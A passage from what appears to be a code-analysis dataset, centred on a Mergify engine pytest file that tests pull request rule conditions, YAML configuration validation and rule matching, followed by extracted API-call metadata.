False, 'import mock\n'), ((13443, 13456), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (13454, 13456), False, 'import pytest\n'), ((13542, 13589), 'itertools.product', 'itertools.product', (['[True, False]', '[True, False]'], {}), '([True, False], [True, False])\n', (13559, 13589), False, 'import itertools\n'), ((1759, 1780), 'numpy.array', 'np.array', (['array_input'], {}), '(array_input)\n', (1767, 1780), True, 'import numpy as np\n'), ((4400, 4423), 'pytest.raises', 'pytest.raises', (['KeyError'], {}), '(KeyError)\n', (4413, 4423), False, 'import pytest\n'), ((4712, 4731), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4724, 4731), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((4829, 4848), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4841, 4848), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((4967, 4986), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (4979, 4986), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5197, 5212), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5205, 5212), True, 'import numpy as np\n'), ((5276, 5295), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (5288, 5295), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5448, 5463), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5456, 5463), True, 'import numpy as np\n'), ((5531, 5550), 'openpathsampling.tests.test_helpers.make_1d_traj', 'make_1d_traj', (['[5.0]'], {}), '([5.0])\n', (5543, 5550), False, 'from openpathsampling.tests.test_helpers import make_1d_traj\n'), ((5701, 5716), 'numpy.array', 'np.array', (['[5.0]'], {}), '([5.0])\n', (5709, 5716), True, 'import numpy as np\n'), ((8154, 8170), 'collections.Counter', 'Counter', (['min_max'], {}), '(min_max)\n', (8161, 8170), False, 'from collections import defaultdict, Counter\n'), ((9370, 9395), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (9383, 9395), False, 'import pytest\n'), ((5165, 5182), 'numpy.array', 'np.array', (['[[5.0]]'], {}), '([[5.0]])\n', (5173, 5182), True, 'import numpy as np\n'), ((8340, 8381), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': '"""period"""'}), "(ValueError, match='period')\n", (8353, 8381), False, 'import pytest\n')]
|
# -*- encoding: utf-8 -*-
#
# Copyright © 2018–2020 Mergify SAS
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
import pytest
import voluptuous
from mergify_engine import context
from mergify_engine import rules
def test_valid_condition():
c = rules.PullRequestRuleCondition("head~=bar")
assert str(c) == "head~=bar"
def test_invalid_condition_re():
with pytest.raises(voluptuous.Invalid):
rules.PullRequestRuleCondition("head~=(bar")
@pytest.mark.parametrize(
"valid",
(
{"name": "hello", "conditions": ["head:master"], "actions": {}},
{"name": "hello", "conditions": ["base:foo", "base:baz"], "actions": {}},
),
)
def test_pull_request_rule(valid):
rules.PullRequestRules.from_list([valid])
def test_same_names():
pull_request_rules = rules.PullRequestRules.from_list(
[
{"name": "hello", "conditions": [], "actions": {}},
{"name": "foobar", "conditions": [], "actions": {}},
{"name": "hello", "conditions": [], "actions": {}},
]
)
assert [rule["name"] for rule in pull_request_rules] == [
"hello #1",
"foobar",
"hello #2",
]
def test_jinja_with_list_attribute():
pull_request_rules = rules.UserConfigurationSchema(
"""
pull_request_rules:
- name: ahah
conditions:
- base=master
actions:
comment:
message: |
This pull request has been approved by:
{% for name in approved_reviews_by %}
@{{name}}
{% endfor %}
Thank you @{{author}} for your contributions!
"""
)["pull_request_rules"]
assert [rule["name"] for rule in pull_request_rules] == [
"ahah",
]
def test_user_configuration_schema():
with pytest.raises(voluptuous.Invalid) as exc_info:
rules.UserConfigurationSchema("- no\n* way")
assert str(exc_info.value) == "Invalid YAML at [line 2, column 2]"
with pytest.raises(voluptuous.Invalid) as i:
rules.UserConfigurationSchema(
"""
pull_request_rules:
- name: ahah
key: not really what we expected
"""
)
assert (
str(i.value) == "extra keys not allowed @ data['pull_request_rules'][0]['key']"
)
ir = rules.InvalidRules(i.value, ".mergify.yml")
assert str(ir) == (
"* extra keys not allowed @ data['pull_request_rules'][0]['key']\n"
"* required key not provided @ data['pull_request_rules'][0]['actions']\n"
"* required key not provided @ data['pull_request_rules'][0]['conditions']"
)
assert [] == ir.get_annotations(".mergify.yml")
with pytest.raises(voluptuous.Invalid) as i:
rules.UserConfigurationSchema(
"""invalid:
- *yaml
"""
)
assert str(i.value) == "Invalid YAML at [line 2, column 3]"
ir = rules.InvalidRules(i.value, ".mergify.yml")
assert (
str(ir)
== """Invalid YAML at [line 2, column 3]
```
found undefined alias 'yaml'
in "<unicode string>", line 2, column 3:
- *yaml
^
```"""
)
assert [
{
"annotation_level": "failure",
"end_column": 3,
"end_line": 2,
"message": "found undefined alias 'yaml'\n"
' in "<unicode string>", line 2, column 3:\n'
" - *yaml\n"
" ^",
"path": ".mergify.yml",
"start_column": 3,
"start_line": 2,
"title": "Invalid YAML",
}
] == ir.get_annotations(".mergify.yml")
with pytest.raises(voluptuous.Invalid) as i:
rules.UserConfigurationSchema(
"""
pull_request_rules:
"""
)
assert (
str(i.value)
== "expected a list for dictionary value @ data['pull_request_rules']"
)
with pytest.raises(voluptuous.Invalid) as i:
rules.UserConfigurationSchema("")
assert str(i.value) == "expected a dictionary"
@pytest.mark.parametrize(
"invalid,match",
(
(
{"name": "hello", "conditions": ["this is wrong"], "actions": {}},
"Invalid condition ",
),
(
{"name": "invalid regexp", "conditions": ["head~=(lol"], "actions": {}},
r"Invalid condition 'head~=\(lol'. Invalid arguments: "
r"missing \), "
r"unterminated subpattern at position 0 @ ",
),
(
{"name": "hello", "conditions": ["head|4"], "actions": {}},
"Invalid condition ",
),
(
{"name": "hello", "conditions": [{"foo": "bar"}], "actions": {}},
r"expected str @ data\[0\]\['conditions'\]\[0\]",
),
(
{"name": "hello", "conditions": [], "actions": {}, "foobar": True},
"extra keys not allowed",
),
(
{"name": "hello", "conditions": [], "actions": {"merge": True}},
r"expected a dictionary for dictionary value "
r"@ data\[0\]\['actions'\]\['merge'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"backport": {"regexes": ["(azerty"]}},
},
r"missing \), unterminated subpattern at position 0 "
r"@ data\[0\]\['actions'\]\['backport'\]\['regexes'\]\[0\]",
),
(
{"name": "hello", "conditions": [], "actions": {"backport": True}},
r"expected a dictionary for dictionary value "
r"@ data\[0\]\['actions'\]\['backport'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"merge": {"strict": "yes"}},
},
r"expected bool for dictionary value @ "
r"data\[0\]\['actions'\]\['merge'\]\['strict'\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"review": {"message": "{{syntax error"}},
},
r"Template syntax error @ data\[0\]\['actions'\]\['review'\]\['message'\]\[line 1\]",
),
(
{
"name": "hello",
"conditions": [],
"actions": {"review": {"message": "{{unknownattribute}}"}},
},
r"Template syntax error for dictionary value @ data\[0\]\['actions'\]\['review'\]\['message'\]",
),
),
)
def test_pull_request_rule_schema_invalid(invalid, match):
with pytest.raises(voluptuous.MultipleInvalid, match=match):
rules.PullRequestRules.from_list([invalid])
def test_get_pull_request_rule():
client = mock.Mock()
get_reviews = [
{
"user": {"login": "sileht", "type": "User"},
"state": "APPROVED",
"author_association": "MEMBER",
}
]
get_files = [{"filename": "README.rst"}, {"filename": "setup.py"}]
get_team_members = [{"login": "sileht"}, {"login": "jd"}]
get_checks = []
get_statuses = [{"context": "continuous-integration/fake-ci", "state": "success"}]
client.item.return_value = {"permission": "write"} # get review user perm
def client_items(url, *args, **kwargs):
if url == "pulls/1/reviews":
return get_reviews
elif url == "pulls/1/files":
return get_files
elif url == "commits/<sha>/check-runs":
return get_checks
elif url == "commits/<sha>/status":
return get_statuses
elif url == "/orgs/orgs/teams/my-reviewers/members":
return get_team_members
else:
raise RuntimeError(f"not handled url {url}")
client.items.side_effect = client_items
ctxt = context.Context(
client,
{
"number": 1,
"html_url": "<html_url>",
"state": "closed",
"merged_by": None,
"merged_at": None,
"merged": False,
"draft": False,
"milestone": None,
"mergeable_state": "unstable",
"assignees": [],
"labels": [],
"author": "jd",
"base": {
"ref": "master",
"repo": {"name": "name", "private": False},
},
"head": {"ref": "myfeature", "sha": "<sha>"},
"locked": False,
"requested_reviewers": [],
"requested_teams": [],
"title": "My awesome job",
"body": "I rock",
"user": {"login": "another-jd"},
},
{},
)
# Empty conditions
pull_request_rules = rules.PullRequestRules(
[{"name": "default", "conditions": [], "actions": {}}]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert [(r, []) for r in match.rules] == match.matching_rules
for rule in match.rules:
assert rule["actions"] == {}
pull_request_rules = rules.PullRequestRules.from_list(
[{"name": "hello", "conditions": ["base:master"], "actions": {}}]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["hello"]
assert [r["name"] for r, _ in match.matching_rules] == ["hello"]
assert [(r, []) for r in match.rules] == match.matching_rules
for rule in match.rules:
assert rule["actions"] == {}
pull_request_rules = rules.PullRequestRules.from_list(
[
{"name": "hello", "conditions": ["base:master"], "actions": {}},
{"name": "backport", "conditions": ["base:master"], "actions": {}},
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["hello", "backport"]
assert [r["name"] for r, _ in match.matching_rules] == ["hello", "backport"]
assert [(r, []) for r in match.rules] == match.matching_rules
for rule in match.rules:
assert rule["actions"] == {}
pull_request_rules = rules.PullRequestRules.from_list(
[
{"name": "hello", "conditions": ["#files=3"], "actions": {}},
{"name": "backport", "conditions": ["base:master"], "actions": {}},
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["hello", "backport"]
assert [r["name"] for r, _ in match.matching_rules] == ["backport"]
for rule in match.rules:
assert rule["actions"] == {}
pull_request_rules = rules.PullRequestRules.from_list(
[
{"name": "hello", "conditions": ["#files=2"], "actions": {}},
{"name": "backport", "conditions": ["base:master"], "actions": {}},
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["hello", "backport"]
assert [r["name"] for r, _ in match.matching_rules] == ["hello", "backport"]
assert [(r, []) for r in match.rules] == match.matching_rules
for rule in match.rules:
assert rule["actions"] == {}
# No match
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "merge",
"conditions": [
"base=xyz",
"status-success=continuous-integration/fake-ci",
"#approved-reviews-by>=1",
],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["merge"]
assert [r["name"] for r, _ in match.matching_rules] == []
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "merge",
"conditions": [
"base=master",
"status-success=continuous-integration/fake-ci",
"#approved-reviews-by>=1",
],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["merge"]
assert [r["name"] for r, _ in match.matching_rules] == ["merge"]
assert [(r, []) for r in match.rules] == match.matching_rules
for rule in match.rules:
assert rule["actions"] == {}
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "merge",
"conditions": [
"base=master",
"status-success=continuous-integration/fake-ci",
"#approved-reviews-by>=2",
],
"actions": {},
},
{
"name": "fast merge",
"conditions": [
"base=master",
"label=fast-track",
"status-success=continuous-integration/fake-ci",
"#approved-reviews-by>=1",
],
"actions": {},
},
{
"name": "fast merge with alternate ci",
"conditions": [
"base=master",
"label=fast-track",
"status-success=continuous-integration/fake-ci-bis",
"#approved-reviews-by>=1",
],
"actions": {},
},
{
"name": "fast merge from a bot",
"conditions": [
"base=master",
"author=mybot",
"status-success=continuous-integration/fake-ci",
],
"actions": {},
},
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == [
"merge",
"fast merge",
"fast merge with alternate ci",
"fast merge from a bot",
]
assert [r["name"] for r, _ in match.matching_rules] == [
"merge",
"fast merge",
"fast merge with alternate ci",
]
for rule in match.rules:
assert rule["actions"] == {}
assert match.matching_rules[0][0]["name"] == "merge"
assert len(match.matching_rules[0][1]) == 1
assert str(match.matching_rules[0][1][0]) == "#approved-reviews-by>=2"
assert match.matching_rules[1][0]["name"] == "fast merge"
assert len(match.matching_rules[1][1]) == 1
assert str(match.matching_rules[1][1][0]) == "label=fast-track"
assert match.matching_rules[2][0]["name"] == "fast merge with alternate ci"
assert len(match.matching_rules[2][1]) == 2
assert str(match.matching_rules[2][1][0]) == "label=fast-track"
assert (
str(match.matching_rules[2][1][1])
== "status-success=continuous-integration/fake-ci-bis"
)
# Team conditions with one review missing
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "default",
"conditions": [
"approved-reviews-by=@orgs/my-reviewers",
"#approved-reviews-by>=2",
],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 1
assert str(match.matching_rules[0][1][0]) == "#approved-reviews-by>=2"
get_reviews.append(
{
"user": {"login": "jd", "type": "User"},
"state": "APPROVED",
"author_association": "MEMBER",
}
)
del ctxt.__dict__["reviews"]
del ctxt.__dict__["consolidated_reviews"]
# Team conditions with no review missing
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "default",
"conditions": [
"approved-reviews-by=@orgs/my-reviewers",
"#approved-reviews-by>=2",
],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 0
# Forbidden labels, when no label set
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "default",
"conditions": ["-label~=^(status/wip|status/blocked|review/need2)$"],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 0
# Forbidden labels, when forbiden label set
ctxt.pull["labels"] = [{"name": "status/wip"}]
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 1
assert str(match.matching_rules[0][1][0]) == (
"-label~=^(status/wip|status/blocked|review/need2)$"
)
# Forbidden labels, when other label set
ctxt.pull["labels"] = [{"name": "allowed"}]
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 0
# Test team expander
pull_request_rules = rules.PullRequestRules.from_list(
[
{
"name": "default",
"conditions": ["author~=^(user1|user2|another-jd)$"],
"actions": {},
}
]
)
match = pull_request_rules.get_pull_request_rule(ctxt)
assert [r["name"] for r in match.rules] == ["default"]
assert [r["name"] for r, _ in match.matching_rules] == ["default"]
assert match.matching_rules[0][0]["name"] == "default"
assert len(match.matching_rules[0][1]) == 0
|
[
"mergify_engine.rules.PullRequestRuleCondition",
"mergify_engine.rules.PullRequestRules.from_list",
"mergify_engine.context.Context",
"unittest.mock.Mock",
"pytest.raises",
"mergify_engine.rules.UserConfigurationSchema",
"pytest.mark.parametrize",
"mergify_engine.rules.InvalidRules",
"mergify_engine.rules.PullRequestRules"
] |
[((989, 1172), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""valid"""', "({'name': 'hello', 'conditions': ['head:master'], 'actions': {}}, {'name':\n 'hello', 'conditions': ['base:foo', 'base:baz'], 'actions': {}})"], {}), "('valid', ({'name': 'hello', 'conditions': [\n 'head:master'], 'actions': {}}, {'name': 'hello', 'conditions': [\n 'base:foo', 'base:baz'], 'actions': {}}))\n", (1012, 1172), False, 'import pytest\n'), ((4461, 6289), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""invalid,match"""', '(({\'name\': \'hello\', \'conditions\': [\'this is wrong\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'invalid regexp\', \'conditions\': [\n \'head~=(lol\'], \'actions\': {}},\n "Invalid condition \'head~=\\\\(lol\'. Invalid arguments: missing \\\\), unterminated subpattern at position 0 @ "\n ), ({\'name\': \'hello\', \'conditions\': [\'head|4\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'hello\', \'conditions\': [{\'foo\': \'bar\'}\n ], \'actions\': {}},\n "expected str @ data\\\\[0\\\\]\\\\[\'conditions\'\\\\]\\\\[0\\\\]"), ({\'name\':\n \'hello\', \'conditions\': [], \'actions\': {}, \'foobar\': True},\n \'extra keys not allowed\'), ({\'name\': \'hello\', \'conditions\': [],\n \'actions\': {\'merge\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': {\n \'regexes\': [\'(azerty\']}}},\n "missing \\\\), unterminated subpattern at position 0 @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]\\\\[\'regexes\'\\\\]\\\\[0\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'merge\': {\'strict\':\n \'yes\'}}},\n "expected bool for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]\\\\[\'strict\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{syntax error\'}}},\n "Template syntax error @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]\\\\[line 1\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{unknownattribute}}\'}}},\n "Template syntax error for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]"\n ))'], {}), '(\'invalid,match\', (({\'name\': \'hello\', \'conditions\':\n [\'this is wrong\'], \'actions\': {}}, \'Invalid condition \'), ({\'name\':\n \'invalid regexp\', \'conditions\': [\'head~=(lol\'], \'actions\': {}},\n "Invalid condition \'head~=\\\\(lol\'. Invalid arguments: missing \\\\), unterminated subpattern at position 0 @ "\n ), ({\'name\': \'hello\', \'conditions\': [\'head|4\'], \'actions\': {}},\n \'Invalid condition \'), ({\'name\': \'hello\', \'conditions\': [{\'foo\': \'bar\'}\n ], \'actions\': {}},\n "expected str @ data\\\\[0\\\\]\\\\[\'conditions\'\\\\]\\\\[0\\\\]"), ({\'name\':\n \'hello\', \'conditions\': [], \'actions\': {}, \'foobar\': True},\n \'extra keys not allowed\'), ({\'name\': \'hello\', \'conditions\': [],\n \'actions\': {\'merge\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': {\n \'regexes\': [\'(azerty\']}}},\n "missing \\\\), unterminated subpattern at position 0 @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]\\\\[\'regexes\'\\\\]\\\\[0\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'backport\': True}},\n "expected a dictionary for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'backport\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'merge\': {\'strict\':\n \'yes\'}}},\n "expected bool for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'merge\'\\\\]\\\\[\'strict\'\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{syntax error\'}}},\n "Template syntax error @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]\\\\[line 1\\\\]"\n ), ({\'name\': \'hello\', \'conditions\': [], \'actions\': {\'review\': {\n \'message\': \'{{unknownattribute}}\'}}},\n "Template syntax error for dictionary value @ data\\\\[0\\\\]\\\\[\'actions\'\\\\]\\\\[\'review\'\\\\]\\\\[\'message\'\\\\]"\n )))\n', (4484, 6289), False, 'import pytest\n'), ((777, 820), 'mergify_engine.rules.PullRequestRuleCondition', 'rules.PullRequestRuleCondition', (['"""head~=bar"""'], {}), "('head~=bar')\n", (807, 820), False, 'from mergify_engine import rules\n'), ((1236, 1277), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (['[valid]'], {}), '([valid])\n', (1268, 1277), False, 'from mergify_engine import rules\n'), ((1328, 1528), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': [], 'actions': {}}, {'name': 'foobar',\n 'conditions': [], 'actions': {}}, {'name': 'hello', 'conditions': [],\n 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [],\n 'actions': {}}, {'name': 'foobar', 'conditions': [], 'actions': {}}, {\n 'name': 'hello', 'conditions': [], 'actions': {}}])\n", (1360, 1528), False, 'from mergify_engine import rules\n'), ((2773, 2816), 'mergify_engine.rules.InvalidRules', 'rules.InvalidRules', (['i.value', '""".mergify.yml"""'], {}), "(i.value, '.mergify.yml')\n", (2791, 2816), False, 'from mergify_engine import rules\n'), ((3351, 3394), 'mergify_engine.rules.InvalidRules', 'rules.InvalidRules', (['i.value', '""".mergify.yml"""'], {}), "(i.value, '.mergify.yml')\n", (3369, 3394), False, 'from mergify_engine import rules\n'), ((7191, 7202), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (7200, 7202), False, 'from unittest import mock\n'), ((8262, 8808), 'mergify_engine.context.Context', 'context.Context', (['client', "{'number': 1, 'html_url': '<html_url>', 'state': 'closed', 'merged_by':\n None, 'merged_at': None, 'merged': False, 'draft': False, 'milestone':\n None, 'mergeable_state': 'unstable', 'assignees': [], 'labels': [],\n 'author': 'jd', 'base': {'ref': 'master', 'repo': {'name': 'name',\n 'private': False}}, 'head': {'ref': 'myfeature', 'sha': '<sha>'},\n 'locked': False, 'requested_reviewers': [], 'requested_teams': [],\n 'title': 'My awesome job', 'body': 'I rock', 'user': {'login':\n 'another-jd'}}", '{}'], {}), "(client, {'number': 1, 'html_url': '<html_url>', 'state':\n 'closed', 'merged_by': None, 'merged_at': None, 'merged': False,\n 'draft': False, 'milestone': None, 'mergeable_state': 'unstable',\n 'assignees': [], 'labels': [], 'author': 'jd', 'base': {'ref': 'master',\n 'repo': {'name': 'name', 'private': False}}, 'head': {'ref':\n 'myfeature', 'sha': '<sha>'}, 'locked': False, 'requested_reviewers': [\n ], 'requested_teams': [], 'title': 'My awesome job', 'body': 'I rock',\n 'user': {'login': 'another-jd'}}, {})\n", (8277, 8808), False, 'from mergify_engine import context\n'), ((9158, 9236), 'mergify_engine.rules.PullRequestRules', 'rules.PullRequestRules', (["[{'name': 'default', 'conditions': [], 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [], 'actions': {}}])\n", (9180, 9236), False, 'from mergify_engine import rules\n'), ((9599, 9703), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (9631, 9703), False, 'from mergify_engine import rules\n'), ((10057, 10234), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['base:master'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n 'base:master'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (10089, 10234), False, 'from mergify_engine import rules\n'), ((10642, 10816), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['#files=3'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n '#files=3'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (10674, 10816), False, 'from mergify_engine import rules\n'), ((11149, 11323), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'hello', 'conditions': ['#files=2'], 'actions': {}}, {'name':\n 'backport', 'conditions': ['base:master'], 'actions': {}}]"], {}), "([{'name': 'hello', 'conditions': [\n '#files=2'], 'actions': {}}, {'name': 'backport', 'conditions': [\n 'base:master'], 'actions': {}}])\n", (11181, 11323), False, 'from mergify_engine import rules\n'), ((11746, 11927), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=xyz',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=xyz', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}])\n", (11778, 11927), False, 'from mergify_engine import rules\n'), ((12302, 12486), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=master',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=master', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}])\n", (12334, 12486), False, 'from mergify_engine import rules\n'), ((13000, 13716), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'merge', 'conditions': ['base=master',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=2'], 'actions': {}}, {'name': 'fast merge',\n 'conditions': ['base=master', 'label=fast-track',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge with alternate ci', 'conditions': ['base=master',\n 'label=fast-track', 'status-success=continuous-integration/fake-ci-bis',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge from a bot', 'conditions': ['base=master', 'author=mybot',\n 'status-success=continuous-integration/fake-ci'], 'actions': {}}]"], {}), "([{'name': 'merge', 'conditions': [\n 'base=master', 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=2'], 'actions': {}}, {'name': 'fast merge',\n 'conditions': ['base=master', 'label=fast-track',\n 'status-success=continuous-integration/fake-ci',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge with alternate ci', 'conditions': ['base=master',\n 'label=fast-track', 'status-success=continuous-integration/fake-ci-bis',\n '#approved-reviews-by>=1'], 'actions': {}}, {'name':\n 'fast merge from a bot', 'conditions': ['base=master', 'author=mybot',\n 'status-success=continuous-integration/fake-ci'], 'actions': {}}])\n", (13032, 13716), False, 'from mergify_engine import rules\n'), ((15550, 15714), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}])\n", (15582, 15714), False, 'from mergify_engine import rules\n'), ((16569, 16733), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n 'approved-reviews-by=@orgs/my-reviewers', '#approved-reviews-by>=2'],\n 'actions': {}}])\n", (16601, 16733), False, 'from mergify_engine import rules\n'), ((17249, 17394), 'mergify_engine.rules.PullRequestRules.from_list', 'rules.PullRequestRules.from_list', (["[{'name': 'default', 'conditions': [\n '-label~=^(status/wip|status/blocked|review/need2)$'], 'actions': {}}]"], {}), "([{'name': 'default', 'conditions': [\n '-label~=^(status/wip|status/blocked|review/need2)$'], 'actions': {}}])\n", (17281, 17394), False, 'from mergify_engine import rules\n'), ((18743, 18872), 